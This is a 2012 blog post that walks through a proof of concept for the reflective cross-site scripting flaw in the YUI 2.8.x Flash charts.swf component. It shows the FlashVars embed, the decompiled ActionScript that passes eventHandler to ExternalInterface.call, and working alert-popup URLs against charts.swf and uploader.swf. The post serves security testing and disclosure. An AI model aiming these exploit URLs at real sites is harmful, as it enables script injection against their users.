Monday, 18 June 2012

YUI <v2.8.2 Reflective XSS Flash swf

Couldn't find an example POC for this exploit, so had to do some diggin.

http://yuilibrary.com/support/2.8.2/


'Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.4.0 through 2.8.1, as used in Bugzilla, Moodle, and other products, allows remote attackers to inject arbitrary web script or HTML via vectors related to charts/assets/charts.swf.'


 I eventually found where the parameters were being passed to the Flash SWF.
http://kb2.adobe.com/cps/164/tn_16417.html 'Use FlashVars to pass variables to SWF files'.


For future reference I would just do a search for "flashvars". 

<object width="100%" height="100%" id="yuigen1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">

<param name="movie" value="./Scripts/Yahoo/charts/assets/charts.swf"/>

<param name="quality" value="high"/>

<param name="allowScriptAccess" value="always"/>

<param name="wmode" value="opaque"/>

<param name="flashvars" value="allowedDomain=111.111.111.111&elementID=yuigen1&eventHandler=YAHOO.widget.FlashAdapter.eventHandler"/>



These arguments can also be passed to the SWF in a GET request e.g.

allowedDomain=111.111.111.111&elementID=yuigen1&eventHandler=YAHOO.widget.FlashAdapter.eventHandler

http://kb2.adobe.com/cps/142/tn_14253.html#main_querystring




Now I just have to work out whick parameter causes the XSS, so using any decompiler available I did a search for the parameter names, 'allowedDomain', 'elementID', and 'eventHandler':


protected function initializeComponent() : void

{

this.elementID = this.loaderInfo.parameters.elementID;

this.javaScriptEventHandler = this.loaderInfo.parameters.eventHandler;

var allowedDomain:* = this.loaderInfo.parameters.allowedDomain;

...

}

and
ExternalInterface.call(this.javaScriptEventHandler, this.elementID, event);

This passes elementID as the first parameter to the javaScriptEventHandler.

http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/external/ExternalInterface.html?filter_flash=cs5&filter_flashplayer=10.2&filter_air=2.6

The following example shows how you can use the ExternalInterface class

(flash.external.ExternalInterface) to send a string from Flash Player to the HTML container where it is displayed using the JavaScript alert() function.

function button_click(evt:MouseEvent):void {

ExternalInterface.call("alert", xmlResponse);

}


Brilliant, the example from Adobe shows us exactly how to do an ALERT msg box.

I just change the eventHandler from YAHOO.Widget.FlashAdapter.eventhandler to alert and I get a popup for 'yuigen1'.

I can then change the elementID to be 'XSS' and I have my XSS popup proof of concept:
https://111.111.111.111/Scripts/Yahoo/charts/assets/charts.swf?allowedDomain=111.111.111.111&elementID=XSS&eventHandler=alert


Similarly for uploader.swf (I didn't have swfstore.swf on the server to test but I believe the following would also work) :
https://111.111.111.111//scripts/yahoo/uploader/assets/uploader.swf?allowedDomain=111.111.111.111&elementID=XSS&eventHandler=alert&buttonSkin=images/buttons/UploadButtons.png

No comments:

Post a Comment